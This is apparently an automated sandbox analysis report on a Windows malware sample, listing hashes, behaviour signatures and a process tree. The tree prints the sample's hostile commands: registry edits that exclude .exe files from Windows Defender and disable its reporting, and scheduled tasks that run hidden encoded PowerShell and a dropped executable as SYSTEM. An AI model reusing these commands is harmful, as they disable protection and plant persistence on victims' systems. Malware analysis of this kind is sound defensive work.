Analysis
-
max time kernel
131s -
max time network
132s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
29-10-2022 18:40
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
9d015ca4140e8a5045a8f5064e78f6db
-
SHA1
8a1d457ad5ae408526ccecc059f1ead34fe0812e
-
SHA256
045f1ac0f642da0fce0104ec7dc53ffaf29df5a35611232db0f9379c1035743e
-
SHA512
c4b8c6174e2249ade687371b9694c38d05da5168cecb38abdb234072555e8901be75dd69004a36c86322990bed13e536af543e08caa46aaad952aa7bbf9d0216
-
SSDEEP
196608:91OVtdoJ2HvNVAD/dygb7MQgC1wWGKrF/cupj:3OVfoJ4CLnc4tGKB/cupj
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 1144 Install.exe 1900 Install.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Loads dropped DLL 8 IoCs
pid Process 1776 file.exe 1144 Install.exe 1144 Install.exe 1144 Install.exe 1144 Install.exe 1900 Install.exe 1900 Install.exe 1900 Install.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\brasnSkGtCxjpntrIe.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1744 schtasks.exe 1068 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 432 powershell.EXE 432 powershell.EXE 432 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 432 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1776 wrote to memory of 1144 1776 file.exe 27 PID 1776 wrote to memory of 1144 1776 file.exe 27 PID 1776 wrote to memory of 1144 1776 file.exe 27 PID 1776 wrote to memory of 1144 1776 file.exe 27 PID 1776 wrote to memory of 1144 1776 file.exe 27 PID 1776 wrote to memory of 1144 1776 file.exe 27 PID 1776 wrote to memory of 1144 1776 file.exe 27 PID 1144 wrote to memory of 1900 1144 Install.exe 28 PID 1144 wrote to memory of 1900 1144 Install.exe 28 PID 1144 wrote to memory of 1900 1144 Install.exe 28 PID 1144 wrote to memory of 1900 1144 Install.exe 28 PID 1144 wrote to memory of 1900 1144 Install.exe 28 PID 1144 wrote to memory of 1900 1144 Install.exe 28 PID 1144 wrote to memory of 1900 1144 Install.exe 28 PID 1900 wrote to memory of 1740 1900 Install.exe 30 PID 1900 wrote to memory of 1740 1900 Install.exe 30 PID 1900 wrote to memory of 1740 1900 Install.exe 30 PID 1900 wrote to memory of 1740 1900 Install.exe 30 PID 1900 wrote to memory of 1740 1900 Install.exe 30 PID 1900 wrote to memory of 1740 1900 Install.exe 30 PID 1900 wrote to memory of 1740 1900 Install.exe 30 PID 1900 wrote to memory of 816 1900 Install.exe 32 PID 1900 wrote to memory of 816 1900 Install.exe 32 PID 1900 wrote to memory of 816 1900 Install.exe 32 PID 1900 wrote to memory of 816 1900 Install.exe 32 PID 1900 wrote to memory of 816 1900 Install.exe 32 PID 1900 wrote to memory of 816 1900 Install.exe 32 PID 1900 wrote to memory of 816 1900 Install.exe 32 PID 1740 wrote to memory of 752 1740 forfiles.exe 34 PID 1740 wrote to memory of 752 1740 forfiles.exe 34 PID 1740 wrote to memory of 752 1740 forfiles.exe 34 PID 1740 wrote to memory of 752 1740 forfiles.exe 34 PID 1740 wrote to memory of 752 1740 forfiles.exe 34 PID 1740 wrote to memory of 752 1740 forfiles.exe 34 PID 1740 wrote to memory of 752 1740 forfiles.exe 34 PID 816 wrote to memory of 1548 816 forfiles.exe 35 PID 816 wrote to memory of 1548 816 forfiles.exe 35 PID 816 wrote to memory of 1548 816 forfiles.exe 35 PID 816 wrote to memory of 1548 816 forfiles.exe 35 PID 816 wrote to memory of 1548 816 forfiles.exe 35 PID 816 wrote to memory of 1548 816 forfiles.exe 35 PID 816 wrote to memory of 1548 816 forfiles.exe 35 PID 752 wrote to memory of 1668 752 cmd.exe 36 PID 752 wrote to memory of 1668 752 cmd.exe 36 PID 752 wrote to memory of 1668 752 cmd.exe 36 PID 752 wrote to memory of 1668 752 cmd.exe 36 PID 752 wrote to memory of 1668 752 cmd.exe 36 PID 752 wrote to memory of 1668 752 cmd.exe 36 PID 752 wrote to memory of 1668 752 cmd.exe 36 PID 1548 wrote to memory of 536 1548 cmd.exe 37 PID 1548 wrote to memory of 536 1548 cmd.exe 37 PID 1548 wrote to memory of 536 1548 cmd.exe 37 PID 1548 wrote to memory of 536 1548 cmd.exe 37 PID 1548 wrote to memory of 536 1548 cmd.exe 37 PID 1548 wrote to memory of 536 1548 cmd.exe 37 PID 1548 wrote to memory of 536 1548 cmd.exe 37 PID 752 wrote to memory of 1428 752 cmd.exe 38 PID 752 wrote to memory of 1428 752 cmd.exe 38 PID 752 wrote to memory of 1428 752 cmd.exe 38 PID 752 wrote to memory of 1428 752 cmd.exe 38 PID 752 wrote to memory of 1428 752 cmd.exe 38 PID 752 wrote to memory of 1428 752 cmd.exe 38 PID 752 wrote to memory of 1428 752 cmd.exe 38 PID 1548 wrote to memory of 1996 1548 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Users\Admin\AppData\Local\Temp\7zS9C21.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1144 -
C:\Users\Admin\AppData\Local\Temp\7zSA304.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:752 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1668
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1428
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1548 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:536
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1996
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNYpoXCqX" /SC once /ST 17:13:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1744
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNYpoXCqX"4⤵PID:1348
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gNYpoXCqX"4⤵PID:1376
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "brasnSkGtCxjpntrIe" /SC once /ST 20:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ZYuTgEApocGMnoUVB\TgenxYmgdCeMHVD\saERaJZ.exe\" bJ /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1068
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {4279DC93-D8C7-44CE-87B4-9F0421993A60} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]1⤵PID:1556
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:432 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:908
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:808
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.2MB
MD532adef4696d0f229c6bdf7b4e2fb4173
SHA11906393aa817e9c12e9134ca1c262217ef086354
SHA2563245449f679d6a511e92e8eeec4230d57713991a248a0a3065344636b06d30b6
SHA512b27ad733e0008468c0f600c12f562ee6bdfd0a771c1570995a53feed8df8fa10e22b415d70b49e2fc01cfbaf0e8054022c9abdd4b0a59cccf12930fce360bf28
-
Filesize
6.2MB
MD532adef4696d0f229c6bdf7b4e2fb4173
SHA11906393aa817e9c12e9134ca1c262217ef086354
SHA2563245449f679d6a511e92e8eeec4230d57713991a248a0a3065344636b06d30b6
SHA512b27ad733e0008468c0f600c12f562ee6bdfd0a771c1570995a53feed8df8fa10e22b415d70b49e2fc01cfbaf0e8054022c9abdd4b0a59cccf12930fce360bf28
-
Filesize
6.7MB
MD5656aaf3ff26281130d5e954069316457
SHA178d76d9dd0b480a371aac131e434e7c363ae7c1d
SHA256adac5e9076347025ad8cec44ee3a40c1b7724d9771824125c94e62c1a8bf6cb4
SHA512fd614934e5ee2d73d373ab4c0463f1c8e64936f7ab411e9feda4a938c612e427f0d09f9f1ec664e2a0580c85a991e11f224a3fed20fedecc44115a696e3cc6be
-
Filesize
6.7MB
MD5656aaf3ff26281130d5e954069316457
SHA178d76d9dd0b480a371aac131e434e7c363ae7c1d
SHA256adac5e9076347025ad8cec44ee3a40c1b7724d9771824125c94e62c1a8bf6cb4
SHA512fd614934e5ee2d73d373ab4c0463f1c8e64936f7ab411e9feda4a938c612e427f0d09f9f1ec664e2a0580c85a991e11f224a3fed20fedecc44115a696e3cc6be
-
Filesize
6.2MB
MD532adef4696d0f229c6bdf7b4e2fb4173
SHA11906393aa817e9c12e9134ca1c262217ef086354
SHA2563245449f679d6a511e92e8eeec4230d57713991a248a0a3065344636b06d30b6
SHA512b27ad733e0008468c0f600c12f562ee6bdfd0a771c1570995a53feed8df8fa10e22b415d70b49e2fc01cfbaf0e8054022c9abdd4b0a59cccf12930fce360bf28
-
Filesize
6.2MB
MD532adef4696d0f229c6bdf7b4e2fb4173
SHA11906393aa817e9c12e9134ca1c262217ef086354
SHA2563245449f679d6a511e92e8eeec4230d57713991a248a0a3065344636b06d30b6
SHA512b27ad733e0008468c0f600c12f562ee6bdfd0a771c1570995a53feed8df8fa10e22b415d70b49e2fc01cfbaf0e8054022c9abdd4b0a59cccf12930fce360bf28
-
Filesize
6.2MB
MD532adef4696d0f229c6bdf7b4e2fb4173
SHA11906393aa817e9c12e9134ca1c262217ef086354
SHA2563245449f679d6a511e92e8eeec4230d57713991a248a0a3065344636b06d30b6
SHA512b27ad733e0008468c0f600c12f562ee6bdfd0a771c1570995a53feed8df8fa10e22b415d70b49e2fc01cfbaf0e8054022c9abdd4b0a59cccf12930fce360bf28
-
Filesize
6.2MB
MD532adef4696d0f229c6bdf7b4e2fb4173
SHA11906393aa817e9c12e9134ca1c262217ef086354
SHA2563245449f679d6a511e92e8eeec4230d57713991a248a0a3065344636b06d30b6
SHA512b27ad733e0008468c0f600c12f562ee6bdfd0a771c1570995a53feed8df8fa10e22b415d70b49e2fc01cfbaf0e8054022c9abdd4b0a59cccf12930fce360bf28
-
Filesize
6.7MB
MD5656aaf3ff26281130d5e954069316457
SHA178d76d9dd0b480a371aac131e434e7c363ae7c1d
SHA256adac5e9076347025ad8cec44ee3a40c1b7724d9771824125c94e62c1a8bf6cb4
SHA512fd614934e5ee2d73d373ab4c0463f1c8e64936f7ab411e9feda4a938c612e427f0d09f9f1ec664e2a0580c85a991e11f224a3fed20fedecc44115a696e3cc6be
-
Filesize
6.7MB
MD5656aaf3ff26281130d5e954069316457
SHA178d76d9dd0b480a371aac131e434e7c363ae7c1d
SHA256adac5e9076347025ad8cec44ee3a40c1b7724d9771824125c94e62c1a8bf6cb4
SHA512fd614934e5ee2d73d373ab4c0463f1c8e64936f7ab411e9feda4a938c612e427f0d09f9f1ec664e2a0580c85a991e11f224a3fed20fedecc44115a696e3cc6be
-
Filesize
6.7MB
MD5656aaf3ff26281130d5e954069316457
SHA178d76d9dd0b480a371aac131e434e7c363ae7c1d
SHA256adac5e9076347025ad8cec44ee3a40c1b7724d9771824125c94e62c1a8bf6cb4
SHA512fd614934e5ee2d73d373ab4c0463f1c8e64936f7ab411e9feda4a938c612e427f0d09f9f1ec664e2a0580c85a991e11f224a3fed20fedecc44115a696e3cc6be
-
Filesize
6.7MB
MD5656aaf3ff26281130d5e954069316457
SHA178d76d9dd0b480a371aac131e434e7c363ae7c1d
SHA256adac5e9076347025ad8cec44ee3a40c1b7724d9771824125c94e62c1a8bf6cb4
SHA512fd614934e5ee2d73d373ab4c0463f1c8e64936f7ab411e9feda4a938c612e427f0d09f9f1ec664e2a0580c85a991e11f224a3fed20fedecc44115a696e3cc6be